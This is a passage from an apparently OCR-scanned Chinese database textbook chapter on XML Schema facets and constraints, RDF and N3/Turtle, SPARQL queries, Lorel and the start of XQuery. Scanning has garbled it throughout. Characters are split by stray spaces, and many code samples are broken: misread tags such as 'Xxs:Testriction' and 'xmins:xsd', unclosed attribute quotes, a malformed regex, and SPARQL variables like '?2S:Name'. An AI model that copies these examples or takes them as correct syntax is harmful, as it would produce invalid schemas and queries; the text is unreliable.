<xs:maxLength value = "5"/> 
</xs:restriction> 
</xs:simpleType> 


新 类 型 被 定义 为 XML Schema 命名 空间 中 的 数据 类 型 string (属性 为 base) 的 受 限 形 
式 ， 指 定 其 最 大 长 度 为 $ 个 字符 (maxLength 元 素 被 称 为 一 个 面 (facet) ) 。XML Schema 定 
义 了 15 个 面 ， 其 中 包含 length、minLength、minInclusive 和 maxInclusive。 另 外 两 个 很 有 
用 的 面 是 pattern 和 enumeration。pattern 元 素 定义 了 一 个 必须 匹配 的 正则 表达 式 。 例 如 ， 若 
STAFFNO 被 限定 为 两 个 大 写字 符 ， 后 面 是 1 至 3 位 数字 (例如 SG5，SG37，SG999 )， 则 
可 以 在 模式 中 用 下 列 方式 表示 : 


<xs:pattern value = "[A-Z]{2}[0-9]{1, 3}"> 


enumeration 元 素 将 一 个 简单 类 型 限定 为 一 组 离散 值 。 例 如 ，POSITION 被 限定 只 能 取 
值 为 Manager、Supervisor 或 Assistant， 可 以 在 模式 中 使 用 下 列 枚 举 来 表示 


<xs:enumeration value = "Manager/> 
<xs:enumeration value = "Supervisor /> 
<xs:enumeration value = "Assistant"/> 


组 
W3C XML Schema 可 以 定义 元 素 组 和 属性 组 。 组 不 是 一 种 数据 类 型 ， 而 是 包含 一 些 元 
素 和 属性 的 容器 。 例 如 ， 可 以 将 员工 表示 为 如 下 的 一 个 组 : 


<xs:group name = "STAFFTYPE'"> 
<xs:sequence> 
<xs:element name = "STAFFNO" type = "STAFFNOTYPE"/> 
<xs:element name = "POSITION" type = "POSITIONTYPE"/> 
<xs:element name = "DOB" type = "xs:date"/> 
<xs:element name = "SALARY" type = "xs:decimal"/> 
</xs:sequence> 
</xs:group> 


上 面 创建 了 一 个 包含 一 些 元 素 (为 简单 起 见 只 列 出 了 STAFF 的 一 部 分 元 素 ) 的 组 ,命名 为 
STAFFTYPE。 也 可 以 创建 一 个 STAFFLIST 元 素来 引用 这 个 组 ， 表 示 零 或 多 个 STAFFTYPE 的 
序列 ， 如 下 所 示 : 


<xs:element name = "STAFFLIST"> 
<xs:complexType> 
<xs:sequence> 
<xs:group ref = "STAFFTYPE" minOccurs = "0" 
maxOccurs = "unbounded"/> 
</xs:sequence> 
</xs:complexType> 
</xs:element> 


choice 和 all 排序 
如 前 所 述 ，sequence 是 排序 的 一 种 。 还 有 另外 两 个 排序 类 型 : choice 和 all。choice 排 
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序 在 几 个 可 能 的 元 素 或 元 素 组 之 间 定 义 了 一 种 选择 ，all 排序 定义 了 元 素 的 一 个 无 序 集合 。 
例如 ， 一 名 员工 的 名 字 可 以 是 一 个 单独 的 字符 串 或 者 是 姓 和 名 的 组 合 ， 可 以 将 这 种 情况 表示 
如 下 : 


<xs:group name = "STAFFNAMETYPE"> 
<xs:choice> 
<xs:element name = "NAME" type = "xs:string /> 
<xs:sequence> 
<xs:element name = "FNAME" type = "xs:string"/> 
<xs:element name = "LNAME" type = "xs:string /> 
</xs:sequence> 
</xs:choice> 
</xs:group> 
列表 和 联合 
可 以 使 用 list 元 素 创建 一 个 以 空白 分 隔 的 列表 。 例 如 ， 创 建 一 个 包含 员工 编号 的 列表 : 


<xs:simpleType name = "SIAFFNOLIST > 
<xs:list itemType = "STAFFNOTYPE'"/> 
</xs:simpleType> 


并 且 在 一 个 XML 文档 中 如 下 使 用 这 种 类 型 ; 
<STAFFNOLIST> "SG5" "SG37" "SG999"</STAFFNOLIST> 


现在 可 以 通过 对 这 个 列表 类 型 施加 某 些 限 制 而 导出 一 种 新 的 类 型 ， 例 如 ， 如 下 构造 一 个 
含有 10 个 值 的 受 限 列表 : 


<xs:simpleType name = "STAFFNOLIST10"> 
<Xxs:Testriction base = "STAFFNOLIST"> 
<xs:Length value = "10"/> 
</xs:restriction> 
</xs:simpleType> 
原子 类 型 和 列表 类 型 使 得 一 个 元 素 或 属性 值 可 以 是 一 种 原子 类 型 的 一 个 或 多 个 实例 。 相 
反 , 一 个 联合 类 型 使 得 一 个 元 素 或 属性 值 可 以 是 这 样 一 种 类 型 的 一 个 或 多 个 实例 ， 这 种 类 型 
选 自 多 个 原子 和 列表 类 型 的 联合 。 这 种 格式 与 上 面 描述 的 choice 相 类 似 ， 所 以 在 这 里 略 过 
细节 。 感 兴趣 的 读者 可 以 参考 W3C XML Schema 文档 ( W3C，2004a，b)。 图 30-14 给 出 了 
30-5 中 的 XML 文档 的 一 个 XML Schema 示例 。 
约束 
已 经 看 到 XML 文档 如 何在 各 个 方面 约束 数据 。W3C XML Schema 也 提供 了 一 个 基于 
XPath 的 特性 ， 来 详细 说 明 在 一 定 范围 内 的 唯一 性 约束 和 相应 的 引用 约束 。 下 面 考虑 两 类 约 
束 : 唯一 性 约束 和 关键 字 约 束 。 
唯一 性 约束 ”为 了 定义 一 个 唯一 性 约束 ， 规 定 了 一 个 unique 元 素 ， 用 它 来 定义 具有 唯 
一 性 的 元 素 和 属性 。 例 如 ， 可 以 在 员工 的 姓 和 出 生日 期 (DOB) 上 定义 一 个 唯一 性 元 素 : 


<xs:unique name = "NAMEDOBUNIQUE "> 
<xs:selector Xpath = "STAFF"/> 
<xs:field xpath = "NAME/LNAME"/> 
<xs:field xpath = "DOB"/> 
</xs:unique> 
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<?xml Version=“1.0” encoding= "UTF-8"?> 
<xs:schema xmins:xsd= "http://www.w3.org/2001/XMLSchema"> 
< 上 |-- 为 STAFFLIST 创 建 一 个 组 --> 
<xs:group name =“STAFELISTGROUP "> 
<xs:element name = "STAFFLIST"> 
<xs:complexType> 
<xs:sequence> 
<xs:group ref = "STAFFTYPE" minOccurs = "0" maxOccurs = "unbounded"/> 
</xs:sequence> 
</xs:complexType> 
</xs:element> 
</xs:group> 
<!-- 为 STAFFNO 元 素 创建 一 个 类 型 --> 
<xs:simpleType name = "STAFFNOTYPE"> 
<xs:restriction base = "xs:string" > 
<xs:maxLength value = "5"/> 
<xs:pattern Value = "[A-Z]{2}[0-9]{1, 3}"> 
</xs:restriction> 
</xs:simpleType> 
<!-- 为 branchNO 属 性 创建 一 个 类 型 --> 
<xs:simpleType name = "BRANCHNOTYPE"> 
<xs:restriction base = "xs:string’> 
<xs:maxLength value = "4"/> 
<xs:pattern value = "[A-Z|[0-9]{3}"> 
</xsirestriction> 
</xs:simpleType> 
<!-- 为 POSITION 元 素 创 建 一 个 类 型 --> 
<xs:simpleType name = "POSITIONTYPE"> 
<Xs:Testriction base = "xs:string"> 
<xs:enumeration value = "Manager"/> 
<xs:enumeration value = "Supervisor"/> 
<xs:enumeration value = "Assistant"/> 
</xs:restriction> 
</xs:simpleType> 
<!-- 为 STAFF 创 建 一 个 组 --> 
<xs:group name = "STAFFTYPE"> 
<xs:element name = "STAFF" > 
<xs:complexType> 
<xs:sequence> 
<xs:element name = "STAFFNO" type = "STAFFNOTYPE"/> 
<xs:element name = "NAME"> 
<xs:complexType> 
<xs:sequence> 
<xs:element name = "FNAME" type = "xs’string"/> 
<xs:element name = "LNAME" type = "xs:string"/> 
</xs:sequence> 
</xs:complexType> 
</xs:element> 
<xs:element name = "POSITION" type = "POSITIONTYPE"/> 
<xs:element name = "DOB" type = "xs:date"/> 
<xs:element name = "SALARY" type = "xs:decimal"/> 
<xs:attribute name = "branchNo" type = "BRANCHNOTYPE"/> 
<xsisequence> 
</xs:complexType> 
</xs:element> 
</xs:group> 
</xs:schema> 


图 30-14 图 30-5 中 XML 文档 的 XML Schema 
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在 模式 中 唯一 性 元 素 的 位 置 提供 了 保持 约束 的 上 下 文 结 点 。 把 这 个 约束 移 在 STAFF 下 
说 明 只 有 在 STAFF 元 素 的 上 下 文 ， 这 种 约束 才 必 须 是 唯一 的 ， 这 与 在 RDBMS 中 规定 约束 
在 一 个 关系 上 成 立 类 似 。 在 下 面 三 个 元 素 中 规定 的 XPath 与 上 下 文 结 点 有 关 。 第 一 个 带 有 
selector 元 素 的 XPath 指定 了 具有 唯一 性 约束 的 元 素 (在 这 个 例子 中 是 STAFF)， 后 面 两 个 
field 元 素 指明 将 进行 唯一 性 检查 的 结 点 。 

关键 字 约 束 ” 关键 字 约束 与 唯一 性 约束 类 似 ， 只 是 值 必须 是 非 空 的 。 它 允许 关键 字 被 引 
用 。 下 面 在 STAFFNO 上 规定 一 个 关键 字 约 束 : 


<xs:key name = "STAFFNOISKEY"> 
<xs:selector xpath = "STAFF"/> 
<xs:field xpath = "STAFFNO"/> 
</xs:key> 
第 三 种 约束 类 型 允许 将 引用 约束 为 指定 关键 字 。 例 如 ，branchNo 属性 最 终 会 引用 一 个 
分 公司 。 如 果 假设 创建 了 那样 的 一 个 元 素 ， 其 关键 字 为 BRANCHNOISKEY， 可 以 将 这 个 属 
性 限定 为 这 个 关键 字 ， 如 下 所 示 : 


<xs:keyref name = "BRANCHNOREF" refer "BRANCHNOISKEY"> 
<xs:selector xpath = "STAFF"/> 
<xs:field xpath = "@branchNo'"/> 

</xs:keyref> 


RDF 


尽管 与 DTD 相 比 ，XML Schema 提供 了 一 个 更 全 面 和 严格 的 方式 来 定义 XML 文档 的 
内 容 模型 ， 但 它 仍然 不 支持 我 们 所 需 的 语义 互 操作 。 例 如 ， 当 两 个 应 用 使 用 XML 交换 信息 
时 ， 在 文件 结构 的 含义 和 使 用 上 都 要 达成 一 致 。 然 而 ， 在 此 之 前 ， 必 须要 建立 所 在 领域 的 模 
型 ， 这 个 模型 阐明 什么 种 类 的 数据 将 会 从 第 一 个 应 用 发 送 到 第 二 个 应 用 。 这 个 模型 通常 用 对 
象 或 关系 进行 描述 (本 书 的 前 面 章 节 中 使 用 UML )。 然 而 ， 由 于 XML Schema 仅仅 描述 了 语 
法 ， 存 在 多 种 不 同 的 方法 把 一 个 具体 的 领域 模型 转化 成 一 个 XML Schema， 因 此 会 失去 领域 
模型 到 其 XML Schema 的 直接 联系 (Decker 等 人 ，2000 )。 如 果 第 三 个 应 用 希望 与 其 他 两 个 
应 用 交换 信息 ， 问 题 就 会 变 得 复杂 。 此 时 ， 仅 将 一 个 XML Schema 转化 成 另 一 个 模式 是 不 
够 的 ， 因 为 任务 不 是 将 一 种 语法 转化 成 另 一 种 语法 ， 而 是 将 对 象 和 关系 从 一 个 领域 映射 到 另 
一 个 领域 。 所 以 映射 需要 三 步 : 

e 根据 XML Schema 重新 构造 原 领域 模型 。 

。 在 领域 模型 中 定义 对 象 间 的 映射 。 

e 定义 XML 文档 的 转化 机 制 ， 例 如 使 用 XSLT。 

这 些 步骤 是 有 实质 含义 的 ， 因 此 可 发 现 XML 非常 适合 在 已 知 数据 内 容 模型 的 应 用 间 进 
行 数 据 交换 ， 但 是 不 适合 在 新 的 应 用 间 交 换 数据 。 我 们 需要 的 是 一 种 表示 所 关心 领域 的 通用 
的 共享 语言 。 

资源 描述 框架 (Resource Description Framework,RDF) 是 在 W3C 的 支持 下 发 展 起 来 的 ， 
是 一 个 能 够 编码 、 转 换 、 重 用 结构 化 元 数据 ( W3C，1999d，2004c) 的 框架 。 这 个 框架 通过 
设计 一 种 支持 语法 、 语 义 、 结 构 的 公共 约定 的 机 制 来 获得 元 数据 的 互 操作 性 。RDF 没有 为 
每 个 关注 的 域 规定 语义 ,但 是 能 够 为 这 些 域 定义 所 需 的 元 数据 元 素 。RDF 使 用 XML 作为 交 
换 和 处 理 数 据 的 通用 语法 ,通过 利用 XML 特征 ，RDF 使 用 了 提供 给 语义 表达 式 的 结构 ， 也 
使 得 提供 了 规范 化 的 元 数据 能 一 致 地 描述 和 交换 。 
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RDF 数据 模型 

基本 的 RDF 数据 模型 包含 三 个 对 象 

e 资源 : 可 以 是 有 一 个 URI 的 任何 对 象 ， 例 如 一 个 网 页 、 若 干 网 页 ， 或 者 某 网 页 的 一 
部 分 比如 一 个 XML 元 素 。 

e 性 质 : 是 用 于 描述 资源 的 一 个 具体 属性 。 例 如 ， 属 性 Author 用 于 描述 产生 一 个 详细 
XML 文档 的 人 。 

e 语句 : 由 一 种 资源 、 一 条 性 质 和 一 个 值 构 成 。 这 些 成 分 被 认为 是 一 个 RDF 语句 的 
“主语 ”、“ 谓 语 ” 和 “宾语 ”。 例 如 ,“ The Author of http://www.dreamhome.co.uk/ 
staff list.xml is John White ”就 是 一 个 语句 。 

可 以 在 RDF 中 表示 上 面 这 个 语句 如 下 : 


<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
xmlns:s="http://www.dreamhome.co.uk/schema/"> 
<rdf:Description about="http://www.dreamhome.co.uk/staff list.xml"> 
<s:Author>John White</s:Author> 
</rdf:Description> 
</rdf:RDF> 


可 以 用 图 30-15a 中 的 有 向 标记 图 来 说 明 。 如 果 和 希望 保存 作者 的 描述 性 信息 ， 则 应 如 图 
30-15b 所 示 将 作者 描述 为 一 个 资源 。 这 个 例子 中 ， 可 以 使 用 下 列 XML 段 来 描述 这 个 元 数据 ; 


<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
xmlns:s="http://www.dreamhome.co.uk/schema/"> 
<rdf:Description about="http://www.dreamhome.co.uk/staff list.xml"> 
<s:Author rdf:resource="http://www.dreamhome.co.uk/Author_001"/> 
</rdf:Description> 
<rdf:Description about="http://www.dreamhome.co.uk/Author_001"> 
<s:Name>John White</s:Name> 
<s:e-mail>white@dreamhome.co.uk</s:e-mail> 
<s:position> Manager</s:position> 
</rdf:Description> 
</rdf:RDF> 






Author 
"John White” 





"Manager” 


“John White” “white@dreamhome.co.uk” 


a) 将 作者 表示 为 一 条 性 质 b) 将 作者 表示 为 一 个 资源 
图 30-15 


Notation3 (N3 ) 及 Turtle 

众所周知 ，Notation3 或 称 N3 是 RDF 模型 的 一 个 简略 非 XML 序列 ， 比 XML 的 RDF 
符号 更 紧凑 、 可 读 性 更 高 。 该 格式 是 由 TimBerners 和 其 他 一 些 来 自 Semantic Wed 社区 的 人 
改进 开发 的 。N3 还 支持 除 RDF 模型 序列 外 的 一 些 特性 ， 比 如 支持 基于 RDF 的 规则 。Turtle 
是 N3 简化 ， 仅 包含 N3 基于 RDF 的 子 集 。 在 N3 和 Turtle (Terse RDF Triple Language) 中 ， 
语句 被 写作 三 元 组 ， 由 主语 URI (使 用 括号 括 住 或 用 命名 空间 缩写 )， 后 跟 谓 语 URI， 再 跟 
宾语 URI 或 文字 值 ， 最 后 是 句号 。 命 名 空间 还 可 以 可 以 在 顶头 用 @prefix 指示 声明 。 例 如 ， 
我 们 可 以 使 用 N3 重 写 之 前 的 RDF 片段 : 
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@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntx-ns#>. 

@prefix s: <http://www.dreamhome.co.uk/schema>. 

<http://www.dreamhome.co.uk/staff list.xml> 

s:Author <http://www.dreamhome.co.uk/Author_001>. 
<http://www.dreamhome.co.uk/Author_001> s:Name "John White". 
<http://www.dreamhome.co.uk/Author_001> 
s:e-mail "white@dreamhome.co.uk". 

<http://www.dreamhome.co.uk/Author_001> s:position "Manager". 

RDF Schema 

RDF Schema 描述 模式 中 有 关 类 的 信息 ， 信 息 包 括 性 质 (属性 ) 与 资源 (类 ) 之 间 的 
联系 。 更 简单 地 说 ，RDF Schema 机 制 提供 了 RDF 模 型 中 使 用 的 基本 类 型 系统 ， 这 类 
似 于 XML Schema (W3C，2000c，2004d) 。 它 定义 了 资源 和 属性 ， 比 如 rdfs:Class 和 
rdfs:subClassOf， 它 们 用 来 描述 与 应 用 相关 的 模式 。 它 也 提供 手段 描述 少量 的 约束 ， 比 如 类 
实例 所 要 求 的 属性 和 允许 的 基数 。 

一 个 RDF Schema 用 声明 语言 描述 ， 这 种 语言 受到 知识 表示 的 思想 (比如 ,语义 网 和 谓 
词 逻辑 ) 以 及 数据 库 模 式 (如 二 元 关系 模型 ) 的 影响 ， 其 中 的 一 个 例子 是 NIAM ( Nijssen 和 
Halpin，1989 ) 和 图 表 数 据 模型 。 对 RDF 和 RDF Schema 更 复杂 的 讨论 超出 了 本 书 的 范围 ， 
感 兴趣 的 读者 可 以 查阅 W3C 文档 。 

SPARQL 

SPARQL (简单 协议 和 RDF 查询 语言 ) ， 读 作 “ sparkle”， 是 由 W3C 的 RDF 数据 访问 工 
作 组 (DAWG) 改进 的 RDF 查询 语言 ， 并 且 被 认为 是 Semantic Web ( W3C，2008 ) 的 组 成 部 
分 。 正 如 之 前 所 见 ，RDF 由 主语 、 谓 语 和 宾语 构成 的 三 元 组 建立 。 同 样 的 ，SPARQL 也 根据 
由 主语 、 谓 语 和 宾语 构成 的 三 元 组 建立 ， 并 以 句号 结束 。 事 实 上 ， 一 个 RDF 三 元 组 也 是 一 个 
SPARQL 三 元 组 。URI (例如 为 识别 资源 ) 被 写 在 尖 括 号 ; 字符 串 用 双 引 号 或 单 引号 表示 ; 性 质 ， 
比如 Name， 可 以 通过 它们 的 URI 或 更 普遍 地 使 用 QName-style 语法 以 增强 可 读 性 。 与 三 元 组 
不 同 ， 三 元 模式 可 以 包括 变量 。 在 三 元 模式 中 任意 或 全 部 的 主语 、 谓 语 以 及 宾语 值 都 可 用 变 
量 替 代 ， 用 来 表示 将 通过 查询 返回 的 感 兴趣 的 数据 项 目 。 下 面 的 例子 会 说 明 SPARQL 的 使 用 。 


| 例 30.3 3 使 用 SPARQL 
(1) 返回 作者 们 的 姓名 和 电子 邮件 


SELECT ?name, ?e-mail 
FROM <http://www.dreamhome.co.uk/staff list.rdf> 
WHERE { 
?x 2S:Name ?name. 
?x ?s:e-mail ?e-mail., 
} 
SELECT 子 语句 用 来 指定 将 通过 查询 返回 的 数据 项 。 在 本 例 中 会 返回 两 个 数据 项 : 作者 
的 名 字 (name) 和 电子 邮件 (e-mail)。 正 如 你 所 想 ， 关 键 字 FROM 确定 查询 将 在 其 上 运行 
的 数据 。 在 本 例 中 ， 查 询 涉及 对 应 RDF 文件 的 URI。 一 次 查询 实际 上 可 能 包括 多 个 FROM 
关键 字 ， 这 是 为 查询 组 装 更 大 的 RDF 图 的 一 种 手段 。 最 后 ， 我 们 用 WHERE 子 名 筛选 通过 
查询 返回 的 数据 (本 题 中 我 们 查询 带 s : Name 和 s : e-mail 的 元 素 )。 关 键 字 WHERE 实际 
上 是 可 选 的 ， 并且 为 了 使 得 查询 更 加 简洁 完全 可 以 省 略 。 
(2) 返回 作者 们 的 姓名 、 电 子 邮 件 和 和 手机 号 码 (车 有 的 话 )， 并 且 根 据 名 字 排 序 结果 
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SELECT ?name, ?e-mail, ?telNo 
FROM <http://www.dreamhome.co.uk/staff list.rdf> 
WHERE { 

?x ?Ss:Name ?name. 

?2s:e-mail ?e-mail. 

OPTIONAL { ?x ?s:telNol ?telNo. } 

} 
ORDER BY ?name 


在 前 一 个 例子 中 ， 我 们 寻找 的 元 素 包 括 s:Name 和 s:e-mail。 在 这 第 二 个 例子 中 ,数据 
项 可 能 有 或 没有 电话 号 码 (telephone number)。 为 了 确保 包含 那些 没有 电话 号 码 的 元 素 ， 我 
们 必须 使 用 关键 字 OPTIONAL。 在 结果 中 ， 如 果 一 个 元 素 没有 telINo 属性 ， 那 么 telNo 变量 
对 于 这 一 具体 的 结果 ( 行 ) 取消 绑 定 。 关 键 字 ORDER BY 用 来 将 结果 排序 。 

(3 ) 返回 那些 是 经 理 或 助理 的 作者 的 姓名 

SELECT ?name 

FROM <http://www.dreamhome.co.uk/staff list.rdf> 

WHERE { 

?x ?s:Name rname. 
?2s:position ?position. 


FILTER { ?position = "Manager" | | ?position = "Assistant". } 人 
} 


关键 字 FILTER 允许 我 们 基于 作者 的 职务 (position) 筛选 返回 的 数据 。 
对 于 SPARQL 更 完整 的 描述 超出 了 本 书 的 范围 ， 有 兴趣 的 读者 可 以 参阅 本 书 末 尾 关于 
本 章节 的 扩展 阅读 部 分 。 


30.5 XML 查询 语言 


数据 抽取 、 转 换 和 集成 都 是 众所周知 的 数据 库 问 题 ， 它 们 依赖 于 一 种 查询 语言 。 在 本 书 
的 前 面部 分 已 经 介绍 了 两 种 标准 的 DBMS 语言 ， 即 SQL 和 OQL。 因 为 XML 数据 的 不 规则 
性 ， 这 两 种 查询 语言 不 能 直接 运用 于 XML。 然而 ，XML 数据 与 30.1 节 讨 论 的 半 结 构 化 数 
据 很 相似 。 有 许多 种 半 结 构 查 询 语言 可 用 于 查询 XML 文档 ， 包 括 XML-QL ( Deutsch 等 人 ， 
1998 )、UnQL ( Buneman 等 人 ，1996 )， 以 及 Microsoft 的 XQL ( Robie 等 人 ，1998 )。 这 些 
语言 都 使 用 路 径 表 达 式 的 概念 来 控制 XML 的 内 套 结构 。 例 如 ，XML-QL 使 用 一 个 髓 套 的 类 
XML 结构 来 描述 文档 的 选中 部 分 以 及 XML 结果 的 结构 。 为 了 找 出 那些 工资 多 于 3 万 英镑 
的 员工 的 姓 ， 可 以 使 用 下 列 查询 : 
WHERE <STAFF> 
<SALARY>$S</SALARY> 
<NAME> <FNAME>$F</FNAME> <LNAME>$L</LNAME> </NAME> 
</STAFF> IN "http://www.dreamhome.co.uk/staff.xml" 
$S > 30000 
CONSTRUCT <LNAME>$L</LNAME> 
尽管 有 许多 不 同方 法 ， 本 节 只 着 重 介绍 两 种 : 
e 如 何 扩展 Lore 数据 模型 和 Lorel 查询 语言 来 处 理 XML。 
e W3C XML Query Working Group (XML 查询 工作 组 ) 的 工作 。 


30.5.1 扩展 Lore 和 Lorel 来 处 理 XML 
在 30.1.2 节 中 曾 介 绍 了 Lore 和 Lorel。 随 着 XML 的 出 现 ，Lore 系统 已 经 被 用 来 处 理 XML 
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(Goldman 等 人 ，1999 )。 在 Lore 的 新 的 基于 XML 的 数据 模型 中 ， 一 个 XML 元 素 是 一 个 
(eid，value) 对 ，eid 是 元 素 的 唯一 标识 符 ，value 既 可 以 是 一 个 字符 串 也 可 以 是 包含 下 列 之 
一 的 复合 值 : 
e 与 该 元 素 的 XML 标记 相应 的 字符 串 标记 。 
e 一 个 有 序 的 属性 名 值 对 表 ， 值 可 为 基本 类 型 (例如 整 型 或 字符 型 ) 或 者 为 一 个 ID、 
IDREF 或 IDREFS。 

e 一 个 形式 为 (label，eid) 的 交 联 (crosslink) 子 元 素 的 有 序 表 ， 其 中 label 是 一 个 字 
符 串 ( 交 联 子 元 素 用 IDREF 或 IDREFS 引出 )。 

@ 一 个 形式 为 (label, eid) 的 正规 (normal) 子 元 素 的 有 序 表 ， 其 中 label 是 字符 串 ( 正 
规 子 元 素 在 XML 文档 中 用 词汇 肉 套 引出 )。 

被 标记 的 元 素 间 的 注释 和 空格 将 被 忽略 ，CDATA 部 分 将 被 解释 成 原子 文本 元 素 。 图 
30-16 显示 了 图 30-7 的 XML 文档 到 数据 模型 的 映射 。 有 趣 的 是 ，Lore 支持 XML 数据 的 两 
个 视图 : 语义 视图 和 文字 视图 。 在 语义 模式 中 ， 数 据 库 可 以 看 作 是 一 个 互 连 图 ,在 这 个 图 
中 ，IDREF 和 IDREFS 这 两 个 属性 被 忽略 ， 子 元 素 之 间 的 差异 以 及 交 联 边 也 被 移 去 ， 所 以 
数据 库 总 是 一 棵 树 。 在 图 30-16 中 ， 子 元 素 边 是 实 线 边 而 交 联 边 是 虚线 边 ，IDREF 属性 显示 
在 f} 中 。 

<DREAMHOME> DREAMHOME 
<STAFF staffNo = "SL21"> 
<NAME>John White</NAME> 
</STAFF> 
<STAFF staffNo = "SL41"> 
<NAME> 
<FNAME>Julie</FNAME> 
<LNAME>Lee</LNAME> {staffNo="SL21"} (到 
</NAME> 
</STAFF> NAME 
<BRANCH staff = "SL21 SL41"> 
<BRANCHNO>B005</BRANCHNO> 


</BRANCH> 
</DREAMHOME> 


到 | {staff= 
"SL21 SL41"} 





图 30-16 用 Lore 表示 的 XML 文档 


Lorel 

在 Lorel 的 XML 版 本 中 ,扩展 了 路 径 表 达 式 的 概念 ， 用 来 控制 属性 和 子 元 素 ， 对 这 两 
者 的 控制 用 一 个 路 径 表 达 式 限定 词 (path expression qualifier) 来 区 分 (“ >” 只 用 于 匹配 子 
元 素 ， 而 “@” 用 于 匹配 属性 )。 如 果 没 有 给 出 限定 词 ， 那 么 可 以 同时 匹配 属性 和 子 元 素 。 
另外 ，Lorel 自身 也 进行 了 扩展 ， 所 以 表达 式 [ range ] 可 以 选择 性 地 应 用 于 任何 路 径 表 达 式 
部 分 或 变量 上 (范围 可 以 是 单个 数值 和 /或 一 个 区 间 ， 比 如 [1-3，7])。 
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以 下 给 出 一 个 Lorel 查询 的 示例 ， 这 个 示例 与 30.4 节 开 始 部 分 给 出 的 XML-QL 示例 等 同 : 


SELECT s.NAME.LNAME 
FROM DREAMHOME.STAFF s 
WHERE s.SALARY > 30000 


30.5.2 XML 查询 工作 组 


W3C 最 近 组 成 了 一 个 XML 查询 工作 组 (XML Query Working Group )， 该 工作 组 的 任务 
是 : 为 XML 文档 建立 一 个 数据 模型 ， 创 建 这 个 模型 上 的 一 系列 查询 运算 符 以 及 基于 这 些 查 
询 运 算 符 的 查询 语言 。 查 询 可 以 在 单个 文档 或 固定 文档 集合 上 操作 ， 可 以 选择 整个 文档 或 者 
基于 文档 内 容 和 结构 满足 匹配 条 件 的 文档 子 树 。 查 询 也 可 以 基于 所 选择 的 内 容 来 构建 新 的 文 
档 。 最 终 ，XML 文档 集 能 够 像 数据 库 一 样 被 访问 。 

如 下 几 个 社区 对 XQuery 规范 做 出 了 贡献 : 

e 数据 库 社 区 在 设计 查询 语言 和 数据 敏感 应 用 的 优化 技术 方面 提供 了 经 验 。 以 数据 为 
中 心 的 应 用 一 般 需 要 在 很 大 的 数据 库 里 进行 有 效 的 更 新 和 检索 操作 。XQuery 吸收 了 
关系 系统 (SQL) 和 面向 对 象 系统 (OQL) 的 查询 语言 的 特性 。 

e 文档 社区 提供 了 设计 处 理 结构 化 文档 系统 的 经 验 。 以 文档 为 中 心 的 应 用 可 能 需要 文 
本 搜索 工具 ， 并 且 处 理 过 程 依赖 于 文档 上 下 文 和 顺序 。XQuery 支持 文档 排序 相关 的 
操作 ， 能 够 导航 、 提 取 和 重 构 文档 。 

e 编程 语言 社区 提供 了 设计 功能 性 语言 、 类 型 系统 和 使 用 语言 规范 的 经 验 。XQuery 是 
具有 静态 类 型 系统 的 函数 型 语言 ， 其 类 型 系统 基于 XML Schema。 下 文 即 可 看 到 ， 
形式 化 语义 已 经 作为 XQuery 规范 的 一 个 有 机 部 分 。 

至 写作 本 书 时 ， 工 作 组 已 提出 若干 文档 : 

XML 查询 需求 (XML Query Requirement)(XQuery ) 。 
XML Query 1.0 用 例 (Use Cases ) 。 

为 XPath 和 XQuery 建立 的 分 词 标记 器 (tokenizer)。 
XML XQuery 1.0 和 XPath 2.0 数据 模型 。 

XML XQuery 1.0 和 XPath 2.0 形式 化 语义 。 

XQuery 1.0 一 一 一 种 XML 查询 语言 。 

针对 XQuery 1.0 的 XML 语法 。 

XML XQuery 1.0 和 XPath 2.0 函数 和 操作 。 

XSLT 2.0 和 XQuery 1.0 系列 ; XQuery 更 新 设施 。 

XML 查询 需求 文档 描述 了 目标 、 使 用 场合 和 W3C XML 查询 数据 模型 的 需求 以 及 查询 

语言 。 某 些 需 求 描述 为 : 

e 语言 必须 是 说 明 性 的 ， 其 定义 必须 独立 于 所 使 用 的 任何 协议 。 

e 数据 模型 必须 能 表示 XML 1.0 字符 数据 和 XML Schema 规范 中 的 简单 和 复杂 类 型 ， 
它 还 必须 支持 文档 内 部 与 外 部 的 引用 。 

e 无 论 是 否 存在 模式 ， 都 应 当 可 以 进行 查询 。 

e 查询 语言 必须 支持 集合 上 的 全 称 和 存在 量词 ， 还 必须 支持 聚集 、 排 序 、 空 值 ， 并 且 
能 够 遍历 文档 内 和 文档 间 的 引用 。 

具有 期 望 返回 值 的 一 组 XML 查询 测试 用 例 也 作为 W3C 文档 的 附录 给 出 。 本 章 接 下 来 
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讨论 XQuery 语言 、 数 据 模型 和 形式 化 语义 。 
30.5.3 XQuery 一 一 XML 的 一 种 查询 语言 


W3C 查询 工作 组 推荐 了 称 为 XQuery 的 XML 查询 语言 (W3C，2003h)。XQuery 是 从 
一 种 称 为 Quilt ( Chamberlin 等 人 ，2000 ) 的 XML 查询 语言 中 演化 而 来 的 ，Quilt 又 从 几 个 
其 他 的 语言 中 借用 了 若干 特征 ， 比 如 XPath、XML-QL、SQL、OQL、Lorel、XQL 和 YATL 
(Cluet 等 人 ，1999 )。 和 OQL 一 样 ，XQuery 是 一 种 函数 型 语言 ， 其 中 每 个 查询 表示 为 一 
个 表达 式 。 表 达 式 的 值 总 是 一 个 序列 (sequence)， 它 是 由 一 个 或 多 个 原子 值 (atomic value ) 
或 结 点 (node) 组 成 的 有 序 集 。 原 子 值 是 单个 值 ， 对 应 于 XML Schema 中 定义 的 简单 类 型 
(参见 30.4 节 ); 结 点 可 以 是 文档 、 元 素 、 属 性 、 文 本 、 命 名 空间 、 处 理 指 令 或 者 是 注释 。 
XQuery 支持 几 种 表达 式 ， 表 达 式 可 以 榜 套 (支持 子 查 询 )。 本 节 讨 论 查询 语言 的 各 个 方面 ， 
并 提供 一 些 例子 。 首 先 讨 论 路 径 表 达 式 和 更 一 般 的 称 为 FLWOR 的 表达 式 类 型 。 

路 径 表 达 式 

XQuery 路 径 表 达 式 使 用 XPath 的 语法 ， 已 在 30.3.4 节 中 讨论 过 。 在 XQuery 中 ， 一 个 
路 径 表 达 式 的 结果 是 结 点 的 有 序 表 ， 包 括 它们 的 子孙 结 点 。 路 径 表 达 式 结果 中 的 顶层 结 点 根 
据 它们 在 原始 层次 中 的 位 置 进行 排序 ， 从 上 到 下 ， 从 左 至 右 。 一 个 路 径 表 达 式 的 结果 可 能 包 
含 重复 的 值 ， 也 就 是 多 个 结 点 具有 相同 类 型 和 内 容 。 

